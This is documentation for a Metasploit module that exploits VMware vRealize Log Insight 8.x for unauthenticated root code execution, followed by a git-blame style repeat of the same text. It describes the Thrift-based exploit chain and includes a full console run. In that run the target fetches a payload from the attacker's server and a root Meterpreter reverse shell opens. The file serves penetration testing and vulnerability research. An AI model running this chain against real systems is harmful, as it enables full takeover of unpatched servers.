documentation/modules/exploit/linux/http/vmware_vrli_rce.md

## Vulnerable Application

vRealize Log Insight provides intelligent log management for infrastructure and applications
in any environment. This highly scalable log management solution delivers intuitive, actionable
dashboards, sophisticated analytics, and broad third-party extensibility across physical, virtual,
and cloud environments.

VMware vRealize Log Insights versions v8.x contain multiple vulnerabilities, such as
directory traversal, broken access control, deserialization, and information disclosure.
When chained together, these vulnerabilities allow a remote, unauthenticated attacker to
execute arbitrary commands on the underlying operating system as the root user.

This module exploits multiple vulnerabilities for achieving unauthenticated remote code execution
on the VMware vRealize Log Insight version `v8.x`. Module achieves code execution via triggering a
`RemotePakDownloadCommand` command via the exposed thrift service after obtaining the node token by
calling a `GetConfigRequest` thrift command. After the download, it will trigger a `PakUpgradeCommand` for
processing the specially crafted PAK archive, which then will place the JSP payload under a
certain API endpoint (pre-authenticated) location upon extraction for gaining remote code execution.

The original analysis and POC is done by the Horizon3.ai Team.
Check [here](https://www.horizon3.ai/vmware-vrealize-log-insight-vmsa-2023-0001-technical-deep-dive/) for full disclosure writeup.

## Testing
For installing the vulnerable version follow the steps below,
1. To obtain the vulnerable OVA image, first create a customer account at
[VMware](https://customerconnect.vmware.com/account-registration) (trial license is sufficient)
2. Navigate [here](https://customerconnect.vmware.com/downloads/details?downloadGroup=VRLI-8102&productId=1351) and download `Virtual Appliance`
3. Import the OVA image into a virtualization software (VirtualBox is used for this case).
4. Start the `VMware_vCenter_Log_Insight` image and proceed with the initial installation steps through the web interface of the product.

After these steps, the web portal (port 80/443) and Apache thrift service (port 16520) should be accessible.

## Verification Steps

1. msfconsole
2. Do: `use exploit/linux/http/vmware_vrli_rce`
3. Do: `set RHOST [IP]`
4. Do: `check`

## Options

### THRIFT_PORT
This is the Thrift service port for VMware xRealize Log Insight.

### ThriftTimeout
Thrift response and connection timeout duration.

## WaitForUpgradeDuration
This value represents the duration of wait after issuing a PakUpgrade command.

## Scenarios

```
msf > use exploit/linux/http/vmware_vrli_rce 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf exploit(linux/http/vmware_vrli_rce) > set rhosts 192.168.56.107
rhosts => 192.168.56.107
msf exploit(linux/http/vmware_vrli_rce) > set lhost 192.168.56.1 
lhost => 192.168.56.1
msf exploit(linux/http/vmware_vrli_rce) > set srvhost 192.168.56.1 
srvhost => 192.168.56.1
msf exploit(linux/http/vmware_vrli_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.107:443 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.56.107:443 - Checking if 192.168.56.107:443 can be exploited.
[+] 192.168.56.107:443 - The target appears to be vulnerable. VMware XRLI Version: 8.10
[*] 192.168.56.107:443 - Starting Payload Server
[*] 192.168.56.107:443 - Using URL: http://192.168.56.1:8080/IssIrRP.tar
[*] 192.168.56.107:443 - Fetching thrift config...
[+] 192.168.56.107:443 - Obtained node token: 015dd665-9f84-4efc-9fd2-1ea2e467dbf8
[*] 192.168.56.107:443 - Sending getNodeType...
[*] 192.168.56.107:443 - Sending RemotePakDownloadCommand...
[*] 192.168.56.107:443 - Sending PakUpgradeCommand...
[*] 192.168.56.107:443 - Encoding the payload as JSP
[*] 192.168.56.107:443 - Malicious TAR payload created (117760 bytes)
[+] 192.168.56.107:443 - Payload requested by 192.168.56.107:443, sending...
[+] 192.168.56.107:443 - PakUpgrade request is successful
[*] 192.168.56.107:443 - Waiting 2 second for PakUpgrade...
[*] 192.168.56.107:443 - 192.168.56.107:443 - Triggering JSP payload...
[*] Sending stage (3045380 bytes) to 192.168.56.107
[+] 192.168.56.107:443 - Deleted /tmp/IssIrRP.pak
[+] 192.168.56.107:443 - Deleted /usr/lib/loginsight/application/3rd_party/apache-tomcat-8.5.82/webapps/ROOT/loginsight/api/api-v5-documentation.jsp
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.107:57010) at 2023-09-07 19:48:14 +0200
[*] 192.168.56.107:443 - Server stopped.

meterpreter > getuid 
Server username: root
meterpreter > sysinfo 
Computer     : 192.168.56.107
OS           : VMware Photon OS 3.0 (Linux 4.19.256-1.ph3)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

```
Add VMware vRealize Log Insight RCE exploit 2023-08-08 00:40:08 +02:00			`## Vulnerable Application`

			`vRealize Log Insight provides intelligent log management for infrastructure and applications`
			`in any environment. This highly scalable log management solution delivers intuitive, actionable`
			`dashboards, sophisticated analytics, and broad third-party extensibility across physical, virtual,`
			`and cloud environments.`

Make some final tweaks 2023-09-08 16:55:42 -04:00			`VMware vRealize Log Insights versions v8.x contain multiple vulnerabilities, such as`
Add VMware vRealize Log Insight RCE exploit 2023-08-08 00:40:08 +02:00			`directory traversal, broken access control, deserialization, and information disclosure.`
			`When chained together, these vulnerabilities allow a remote, unauthenticated attacker to`
			`execute arbitrary commands on the underlying operating system as the root user.`

			`This module exploits multiple vulnerabilities for achieving unauthenticated remote code execution`
			on the VMware vRealize Log Insight version `v8.x`. Module achieves code execution via triggering a
			`RemotePakDownloadCommand` command via the exposed thrift service after obtaining the node token by
			calling a `GetConfigRequest` thrift command. After the download, it will trigger a `PakUpgradeCommand` for
			`processing the specially crafted PAK archive, which then will place the JSP payload under a`
			`certain API endpoint (pre-authenticated) location upon extraction for gaining remote code execution.`

			`The original analysis and POC is done by the Horizon3.ai Team.`
			`Check [here](https://www.horizon3.ai/vmware-vrealize-log-insight-vmsa-2023-0001-technical-deep-dive/) for full disclosure writeup.`

			`## Testing`
			`For installing the vulnerable version follow the steps below,`
			`1. To obtain the vulnerable OVA image, first create a customer account at`
			`[VMware](https://customerconnect.vmware.com/account-registration) (trial license is sufficient)`
Make some final tweaks 2023-09-08 16:55:42 -04:00			2. Navigate [here](https://customerconnect.vmware.com/downloads/details?downloadGroup=VRLI-8102&productId=1351) and download `Virtual Appliance`
Add VMware vRealize Log Insight RCE exploit 2023-08-08 00:40:08 +02:00			`3. Import the OVA image into a virtualization software (VirtualBox is used for this case).`
			4. Start the `VMware_vCenter_Log_Insight` image and proceed with the initial installation steps through the web interface of the product.

			`After these steps, the web portal (port 80/443) and Apache thrift service (port 16520) should be accessible.`

			`## Verification Steps`

			`1. msfconsole`
			2. Do: `use exploit/linux/http/vmware_vrli_rce`
			3. Do: `set RHOST [IP]`
			4. Do: `check`

			`## Options`

			`### THRIFT_PORT`
			`This is the Thrift service port for VMware xRealize Log Insight.`

Add and use a Thrift client object 2023-09-11 12:40:19 -04:00			`### ThriftTimeout`
			`Thrift response and connection timeout duration.`
Update options 2023-09-07 19:50:10 +02:00
			`## WaitForUpgradeDuration`
			`This value represents the duration of wait after issuing a PakUpgrade command.`

Add VMware vRealize Log Insight RCE exploit 2023-08-08 00:40:08 +02:00			`## Scenarios`

			```
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf > use exploit/linux/http/vmware_vrli_rce`
Add VMware vRealize Log Insight RCE exploit 2023-08-08 00:40:08 +02:00			`[*] Using configured payload linux/x64/meterpreter/reverse_tcp`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/vmware_vrli_rce) > set rhosts 192.168.56.107`
Add VMware vRealize Log Insight RCE exploit 2023-08-08 00:40:08 +02:00			`rhosts => 192.168.56.107`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/vmware_vrli_rce) > set lhost 192.168.56.1`
Add VMware vRealize Log Insight RCE exploit 2023-08-08 00:40:08 +02:00			`lhost => 192.168.56.1`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/vmware_vrli_rce) > set srvhost 192.168.56.1`
Update options 2023-09-07 19:50:10 +02:00			`srvhost => 192.168.56.1`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/vmware_vrli_rce) > run`
Add VMware vRealize Log Insight RCE exploit 2023-08-08 00:40:08 +02:00
			`[*] Started reverse TCP handler on 192.168.56.1:4444`
			`[*] 192.168.56.107:443 - Running automatic check ("set AutoCheck false" to disable)`
			`[*] 192.168.56.107:443 - Checking if 192.168.56.107:443 can be exploited.`
			`[+] 192.168.56.107:443 - The target appears to be vulnerable. VMware XRLI Version: 8.10`
			`[*] 192.168.56.107:443 - Starting Payload Server`
Update options 2023-09-07 19:50:10 +02:00			`[*] 192.168.56.107:443 - Using URL: http://192.168.56.1:8080/IssIrRP.tar`
Add VMware vRealize Log Insight RCE exploit 2023-08-08 00:40:08 +02:00			`[*] 192.168.56.107:443 - Fetching thrift config...`
			`[+] 192.168.56.107:443 - Obtained node token: 015dd665-9f84-4efc-9fd2-1ea2e467dbf8`
			`[*] 192.168.56.107:443 - Sending getNodeType...`
			`[*] 192.168.56.107:443 - Sending RemotePakDownloadCommand...`
Update options 2023-09-07 19:50:10 +02:00			`[*] 192.168.56.107:443 - Sending PakUpgradeCommand...`
Add VMware vRealize Log Insight RCE exploit 2023-08-08 00:40:08 +02:00			`[*] 192.168.56.107:443 - Encoding the payload as JSP`
Update options 2023-09-07 19:50:10 +02:00			`[*] 192.168.56.107:443 - Malicious TAR payload created (117760 bytes)`
Add VMware vRealize Log Insight RCE exploit 2023-08-08 00:40:08 +02:00			`[+] 192.168.56.107:443 - Payload requested by 192.168.56.107:443, sending...`
Update options 2023-09-07 19:50:10 +02:00			`[+] 192.168.56.107:443 - PakUpgrade request is successful`
			`[*] 192.168.56.107:443 - Waiting 2 second for PakUpgrade...`
Add VMware vRealize Log Insight RCE exploit 2023-08-08 00:40:08 +02:00			`[*] 192.168.56.107:443 - 192.168.56.107:443 - Triggering JSP payload...`
			`[*] Sending stage (3045380 bytes) to 192.168.56.107`
Update options 2023-09-07 19:50:10 +02:00			`[+] 192.168.56.107:443 - Deleted /tmp/IssIrRP.pak`
			`[+] 192.168.56.107:443 - Deleted /usr/lib/loginsight/application/3rd_party/apache-tomcat-8.5.82/webapps/ROOT/loginsight/api/api-v5-documentation.jsp`
			`[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.107:57010) at 2023-09-07 19:48:14 +0200`
Add VMware vRealize Log Insight RCE exploit 2023-08-08 00:40:08 +02:00			`[*] 192.168.56.107:443 - Server stopped.`

Update options 2023-09-07 19:50:10 +02:00			`meterpreter > getuid`
			`Server username: root`
Add VMware vRealize Log Insight RCE exploit 2023-08-08 00:40:08 +02:00			`meterpreter > sysinfo`
			`Computer : 192.168.56.107`
			`OS : VMware Photon OS 3.0 (Linux 4.19.256-1.ph3)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			`meterpreter >`

			```